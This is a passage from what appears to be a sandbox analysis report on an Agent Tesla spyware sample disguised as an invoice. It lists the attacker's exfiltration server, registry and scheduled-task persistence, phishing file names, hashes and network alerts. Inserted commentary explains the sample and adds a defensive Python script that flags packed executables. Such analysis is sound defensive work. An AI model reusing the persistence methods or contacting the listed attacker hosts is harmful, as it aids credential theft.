                                        http://mail.oceanskylogistics.inRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comandINVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
IP: 43.255.154.57
Domain: mail.oceanskylogistics.in
Country: Singapore
ASN: 26496 (AS-26496-GO-DADDY-COM-LLC, US)
Malicious: true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 680571
Start date and time: 2022-08-08 20:18:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: INVOICE OUTSTANDING.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 105
• Number of non-executed functions: 23
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
20:20:23  API Interceptor  1x Sleep call for process: INVOICE OUTSTANDING.exe modified
20:20:50  API Interceptor  541x Sleep call for process: RegSvcs.exe modified
20:20:54  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
20:21:02  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
Match: 43.255.154.57 (IP)
Associated samples, all detected as malicious:
• UPDATED SOA.exe
• QUOTATION REQUEST.exe
• BANK DETAILS.exe
• FREIGHT PAYMENT CONFIRMATION.exe
• BANK DETAILS.exe
• ExW7tuqH3zxNcwp.exe
• BANK DETAILS.exe
• PROFOMA INVOICE.exe
• HT97832022017.exe
• PURCHASE ORDER # 12076030 & 12076022.exe
• SOA.exe
• SWIFT COPY.exe
• BANK DETAILS.exe
• UPDATED SOA.exe
• TT COPY.exe
• REVISED BL.exe
• APRIL SOA PAYMENTS.exe
• Invoice and account details.exe
• f8keZ8QG3Lw4Vvy.exe
• INVOICE.1.exe
Match: mail.oceanskylogistics.in (domain)
Associated samples, all detected as malicious, each with context IP 43.255.154.57:
• UPDATED SOA.exe
• QUOTATION REQUEST.exe
• BANK DETAILS.exe
• FREIGHT PAYMENT CONFIRMATION.exe
• BANK DETAILS.exe
• ExW7tuqH3zxNcwp.exe
• BANK DETAILS.exe
• PROFOMA INVOICE.exe
• HT97832022017.exe
• PURCHASE ORDER # 12076030 & 12076022.exe
• SOA.exe
• SWIFT COPY.exe
• BANK DETAILS.exe
• UPDATED SOA.exe
• TT COPY.exe
• REVISED BL.exe
• APRIL SOA PAYMENTS.exe
• Invoice and account details.exe
• f8keZ8QG3Lw4Vvy.exe
• INVOICE.1.exe
Match: AS-26496-GO-DADDY-COM-LLC, US (ASN)
Associated samples / URLs, all detected as malicious, with their context IP:
• http://okaloosaclerk.loyaltyhn.com/#.aHR0cDovL2Z1ZWd1aWxsb3MuY2wvd3AtaW5jbHVkZXMvaW1hZ2VzL3NtaWxpZXMvenovP2U9dHdpbGNveEBva2Fsb29zYWNsZXJrLmNvbQ== (107.180.40.120)
• Technical Specifications & Drawings.exe (184.168.107.80)
• botx.mips (192.186.201.194)
• Payment_Advice.exe (50.62.89.58)
• SecuriteInfo.com.Variant.Lazy.207585.8857.exe (192.186.233.163)
• https://hivnd.com/gmt.js (184.168.104.171)
• http://5555882333322111.sharepointdeeplinkreviewdocx.com/ (72.167.58.252)
• http://148.66.136.3 (148.66.145.139)
• Singed Docments.exe (184.168.102.151)
• Versanddetails.exe (104.238.70.184)
• http://hivnd.com (184.168.104.171)
• https://hivnd.com/thumpxcache/ (184.168.104.171)
• https://hivnd.com/gmt.js (184.168.104.171)
• UPDATED SOA.exe (43.255.154.57)
• NHPUWUJUFDLFFTSGRWJKA.VBS (107.180.27.238)
• HWQYKIYQXULHHADVTCBZV.VBS (107.180.27.238)
• http://x4r.rfp-inc.cam/ (184.168.120.159)
• AmatuneMusicConverter.exe (72.167.52.84)
• https://vipguestinvites.com/s/CHAMBERLIN22/gsx_2022 (148.72.108.121)
• Purchase Order (2).exe (184.168.102.151)
No context

Match:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
Associated Sample Name / URL:
• BANK COPY.exe, Detection: malicious
• new artwork.exe, Detection: malicious
• new artwork.exe, Detection: malicious
• Processed payment.exe, Detection: malicious
• BANK COPY.exe, Detection: malicious
• PO CPWPKL-1901088.exe, Detection: malicious
• UPDATED SOA.exe, Detection: malicious
• Ordem de Compra pdf QD2y.exe, Detection: malicious
• INVOICE.exe, Detection: malicious
• xox.exe, Detection: malicious
• payment.exe, Detection: malicious
• payment.exe, Detection: malicious
• REMINDER 1.exe, Detection: malicious
• Offer for sale.exe, Detection: malicious
• purchase order.exe, Detection: malicious
• Offer for sale.exe, Detection: malicious
• svbhjvUpxT.exe, Detection: malicious
• SHIPMENT DOCUMENT.exe, Detection: malicious
• g0t8s6FogF.exe, Detection: malicious
• QUATION.exe, Detection: malicious

Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.355304211458859
Encrypted:false
SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:69206D3AF7D6EFD08F4B4726998856D3
SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:true
Reputation:high, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):142
Entropy (8bit):5.090621108356562
Encrypted:false
SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:8C0458BB9EA02D50565175E38D577E35
SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1642
Entropy (8bit):5.1822034700146205
Encrypted:false
SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJYtn:cbh47TlNQ//rydbz9I3YODOLNdq3S
MD5:2B04C027DCB9FF6FBBB8566586DA0617
SHA1:A349F8FD51F9D28B0F35CEDD9FFA14A608C419B6
SHA-256:E0C5C7F2EAC8081C8BF375CE293F7426421D9EDB7873ADFD14B3D851B7208252
SHA-512:15B6E73A6D0ED9F862D331AA04E76302DC905FF9D9022AE883B17F598BB7919913F44771807CBA1830035646E23031993D1DED132E807CC60321DB33435B9AC9
Malicious:true
Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1031168
Entropy (8bit):7.486735500072679
Encrypted:false
SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
MD5:0FA9D94D6393235F67A17B220902DBFA
SHA1:3C0AE56AB072F622DA13806B4336F01F7137EE4C
SHA-256:65EA111F533E1283B202B87434EA207410C1680EADC9B2193C76179EB87DECFC
SHA-512:1C2D817ADDC45161E63667895E1C54306E5F8F27F4804D6D7A06163B62451B3189E7FA6608B24BB7DD8969B23285286E82750351F1322B2714A31546FAB9B5C5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 38%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................8.......H.......8~..\H..............p.............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0..<........~.....(,.....,!r...p.....(-...o....s/............~.....+..*.0...........~.....+..*".......*.0..&........(....r5..p~....o0...(1.....t$....+..*...0..&........(....rC..p~....o0...(1.....

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:modified
Size (bytes):45152
Entropy (8bit):6.149629800481177
Encrypted:false
SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
MD5:2867A3817C9245F7CF518524DFD18F28
SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: BANK COPY.exe, Detection: malicious
• Filename: new artwork.exe, Detection: malicious
• Filename: new artwork.exe, Detection: malicious
• Filename: Processed payment.exe, Detection: malicious
• Filename: BANK COPY.exe, Detection: malicious
• Filename: PO CPWPKL-1901088.exe, Detection: malicious
• Filename: UPDATED SOA.exe, Detection: malicious
• Filename: Ordem de Compra pdf QD2y.exe, Detection: malicious
• Filename: INVOICE.exe, Detection: malicious
• Filename: xox.exe, Detection: malicious
• Filename: payment.exe, Detection: malicious
• Filename: payment.exe, Detection: malicious
• Filename: REMINDER 1.exe, Detection: malicious
• Filename: Offer for sale.exe, Detection: malicious
• Filename: purchase order.exe, Detection: malicious
• Filename: Offer for sale.exe, Detection: malicious
• Filename: svbhjvUpxT.exe, Detection: malicious
• Filename: SHIPMENT DOCUMENT.exe, Detection: malicious
• Filename: g0t8s6FogF.exe, Detection: malicious
• Filename: QUATION.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):835
Entropy (8bit):4.694294591169137
Encrypted:false
SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
MD5:6EB47C1CF858E25486E42440074917F2
SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
Malicious:true
Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1141
Entropy (8bit):4.44831826838854
Encrypted:false
SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
Malicious:false
Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.486735500072679
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:INVOICE OUTSTANDING.exe
File size:1031168
MD5:0fa9d94d6393235f67a17b220902dbfa
SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
SHA512:1c2d817addc45161e63667895e1c54306e5f8f27f4804d6d7a06163b62451b3189e7fa6608b24bb7dd8969b23285286e82750351f1322b2714a31546fab9b5c5
SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
TLSH:2D25E0A069EC715AE03912B132F064EA57F6AC37C914D22C7D96B76F87B3EC100A3593
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@................................
Icon Hash:f9c9a99884c2d218
Entrypoint:0x4ce656
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x62F102BE [Mon Aug 8 12:34:06 2022 UTC]
TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times)
The single jmp is the entire native entry stub: 0x402000 is ImageBase 0x400000 plus RVA 0x2000, the 8-byte IAT whose only slot is mscoree!_CorExeMain, so execution goes straight into the CLR. The bytes after the jmp are 00 00 padding, which the disassembler decodes as add byte ptr [eax], al; they are not code.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xce604 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd0000 | 0x2ee1c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x100000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xcc65c | 0xcc800 | False | 0.8614224384932763 | data | 7.770423052382821 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd0000 | 0x2ee1c | 0x2f000 | False | 0.3779141040558511 | data | 5.52480890734526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x100000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xd02b0 | 0x6e15 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0xd70c8 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0xe78f0 | 0x94a8 | data | |
RT_ICON | 0xf0d98 | 0x5488 | data | |
RT_ICON | 0xf6220 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 2130706432 | |
RT_ICON | 0xfa448 | 0x25a8 | data | |
RT_ICON | 0xfc9f0 | 0x10a8 | data | |
RT_ICON | 0xfda98 | 0x988 | data | |
RT_ICON | 0xfe420 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xfe888 | 0x84 | data | |
RT_VERSION | 0xfe90c | 0x324 | data | |
RT_MANIFEST | 0xfec30 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

DLL | Import
mscoree.dll | _CorExeMain
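The section table above reports a Shannon entropy of 7.77 for .text (against 5.52 for .rsrc and near zero for .reloc), a populated CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2008) and a single import, mscoree!_CorExeMain. Together those three fields say "managed executable whose code section is mostly high-entropy data", the static fingerprint of a packed .NET loader. The Python below is an added example, not Joe Sandbox's code and not anything from the sample: it walks the PE headers, computes per-section entropy as the Entropy column does, and applies the two checks. The PE it parses is constructed inside the block (build_test_pe) because the sample itself is not on this page; the 7.0 threshold and all function names are this example's choices.

```python
import math
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR header slot in the data directory
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0..8.0: the quantity the section table's Entropy column reports."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """Minimal PE32/PE32+ header walk: entry point, CLR directory, per-section entropy."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symp, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:          # PE32: NumberOfRvaAndSizes at +92, directories at +96
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:        # PE32+: +108 / +112
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry = struct.unpack_from("<I", blob, opt + 16)[0]   # AddressOfEntryPoint, same offset in both
    ndirs = struct.unpack_from("<I", blob, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", blob, dirs_off + 8 * i) for i in range(ndirs)]
    clr_rva, clr_size = dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] if ndirs > 14 else (0, 0)

    sections = []
    sh = opt + opt_size                       # section headers follow the optional header
    for i in range(nsections):
        off = sh + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, off)
        chars = struct.unpack_from("<I", blob, off + 36)[0]
        raw = blob[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": shannon_entropy(raw),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return {"entrypoint": entry, "clr_rva": clr_rva, "clr_size": clr_size, "sections": sections}


def triage(pe: dict, high: float = 7.0) -> list:
    """The static verdicts a triage script draws from these fields (threshold is an assumption)."""
    findings = []
    if pe["clr_rva"]:
        findings.append("managed (.NET) image: CLR header at RVA 0x%x" % pe["clr_rva"])
    for s in pe["sections"]:
        if s["executable"] and s["entropy"] > high:
            findings.append("%s: entropy %.2f in an executable section, likely packed or encrypted payload"
                            % (s["name"], s["entropy"]))
        if s["rawsize"] == 0 and s["vsize"] > 0:
            findings.append("%s: no raw data but %d virtual bytes, filled at runtime" % (s["name"], s["vsize"]))
    return findings


def build_test_pe(text_payload: bytes, clr_rva: int = 0x2008) -> bytes:
    """Construct a minimal PE32 with one .text section (test input only, not the report's sample)."""
    headers_size = 0x200
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    opt_size = 96 + 16 * 8
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                # Section/File alignment
    struct.pack_into("<I", opt, 60, headers_size)                  # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR,
                     clr_rva, 0x48 if clr_rva else 0)              # CLR header directory
    raw_size = (len(text_payload) + 0x1FF) & ~0x1FF
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text_payload), 0x2000, raw_size,
                      headers_size, 0, 0, 0, 0, 0x60000020)        # CODE|EXECUTE|READ
    header = (dos + b"PE\0\0" + coff + bytes(opt) + sec).ljust(headers_size, b"\0")
    return header + text_payload.ljust(raw_size, b"\0")


if __name__ == "__main__":
    # 4096 bytes holding every value exactly 16 times: entropy is exactly 8.0, the packed case.
    packed = parse_pe(build_test_pe(bytes(range(256)) * 16))
    for line in triage(packed):
        print(line)
```

Pointing parse_pe at a real file (open(path, "rb").read()) gives the same per-section figures the report prints; the entropy value alone does not distinguish a packer from a large compressed resource, which is why the check is restricted to sections flagged executable.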
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/08/22-20:20:11.732977 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49763 | 587 | 192.168.2.3 | 43.255.154.57
08/08/22-20:20:11.733160 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49763 | 587 | 192.168.2.3 | 43.255.154.57
08/08/22-20:20:11.733160 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49763 | 587 | 192.168.2.3 | 43.255.154.57
08/08/22-20:20:11.732977 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49763 | 587 | 192.168.2.3 | 43.255.154.57

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 20:20:08.485892057 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:08.739192009 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
